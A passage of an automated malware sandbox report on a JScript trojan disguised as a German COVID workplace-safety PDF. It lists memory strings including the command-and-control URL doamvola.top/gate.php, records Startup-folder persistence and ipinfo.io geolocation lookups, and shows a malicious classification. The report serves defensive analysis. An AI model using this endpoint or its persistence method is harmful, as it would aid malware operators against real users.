Source: wscript.exe, 00000000.00000002.3161931879.00000000062F0000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1D2.crl0
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: wscript.exe, 00000000.00000002.3161234752.00000000046D0000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/
Source: wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/V
Source: wscript.exe, 00000006.00000002.3161383092.00000000049AF000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php
Source: wscript.exe, 00000000.00000002.3161828421.0000000005ECC000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.php72EE55Cwx
Source: wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/gate.phpor
Source: wscript.exe, 00000000.00000002.3161234752.00000000046D0000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/r
Source: wscript.exe, 00000000.00000002.3161234752.00000000046D0000.00000004.00000001.sdmpString found in binary or memory: http://doamvola.top/verse
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: wscript.exe, 00000006.00000003.2201987519.00000000048F1000.00000004.00000001.sdmpString found in binary or memory: http://ipinfo.io/
Source: wscript.exe, 00000006.00000003.2151431296.00000000002CD000.00000004.00000001.sdmpString found in binary or memory: http://ipinfo.io/country
Source: wscript.exe, 00000006.00000003.2151431296.00000000002CD000.00000004.00000001.sdmp, wscript.exe, 00000006.00000003.2201881425.00000000048E4000.00000004.00000001.sdmpString found in binary or memory: http://ipinfo.io/ip
Source: wscript.exe, 00000000.00000002.3161612768.0000000005C77000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161643387.0000000005C87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: wscript.exe, 00000000.00000002.3161612768.0000000005C77000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161643387.0000000005C87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0K
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0M
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1d20
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1D2.crt0
Source: wscript.exe, 00000000.00000002.3159054091.0000000004010000.00000002.00000001.sdmp, net.exe, 00000005.00000002.2131368169.00000000004B0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3159377354.00000000041B0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wscript.exe, 00000000.00000002.3158106159.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: wscript.exe, 00000000.00000002.3161612768.0000000005C77000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161643387.0000000005C87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: wscript.exe, 00000000.00000002.3161931879.00000000062F0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
Source: wscript.exe, 00000000.00000002.3161931879.00000000062F0000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: wscript.exe, 00000000.00000002.3161612768.0000000005C77000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161643387.0000000005C87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: wscript.exe, 00000000.00000002.3159054091.0000000004010000.00000002.00000001.sdmp, net.exe, 00000005.00000002.2131368169.00000000004B0000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3159377354.00000000041B0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wscript.exe, 00000000.00000002.3161931879.00000000062F0000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: wscript.exe, 00000000.00000002.3161612768.0000000005C77000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161643387.0000000005C87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: wscript.exe, 00000000.00000002.3161931879.00000000062F0000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: wscript.exe, 00000000.00000002.3161172790.0000000004676000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/
Source: wscript.exe, 00000006.00000003.2151431296.00000000002CD000.00000004.00000001.sdmpString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js
Source: wscript.exe, 00000000.00000002.3157815657.00000000000AE000.00000004.00000020.sdmpString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js=D8
Source: wscript.exe, 00000000.00000002.3161074361.0000000004580000.00000004.00000040.sdmpString found in binary or memory: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.jsc
Source: wscript.exe, 00000000.00000002.3161187686.0000000004690000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.3161248113.00000000048DD000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: wscript.exe, 00000000.00000002.3161150492.0000000004632000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Source: Arbeitsschutzregel-Corona-September.pdf.jsInitial sample: Strings found which are bigger than 50
Source: wscript.exe, 00000000.00000002.3161408082.0000000005A90000.00000002.00000001.sdmp, wscript.exe, 00000006.00000002.3161488253.0000000005AA0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winJS@10/4@17/6
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Arbeitsschutzregel-Corona-September.pdf.jsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\json2.jsJump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ................................S.y.s.t.e.m. .e.r.r.o.r. .6.1.1.8. .h.a.s. .o.c.c.u.r.r.e.d.....................8.......B.......................Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ....................................s.t.(.P.....4...............`........k......................................8...............x...............Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ........................................(.P.....4...............`........k......................................................x...............Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: ........................................(.P.....4...............`........k......................................8...............................Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: .................. .............A. .r.e.m.o.t.e. .A.P.I. .e.r.r.o.r. .o.c.c.u.r.r.e.d............................. .....<.......................Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: .................. .................r.e.(.P.....................D................................................. .............(...............Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: .................. .....................(.P.....................D.......................................................h.......(...............Jump to behavior
Source: C:\Windows\System32\net.exeConsole Write: .................. .....................(.P.....................D................................................. .............................Jump to behavior
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts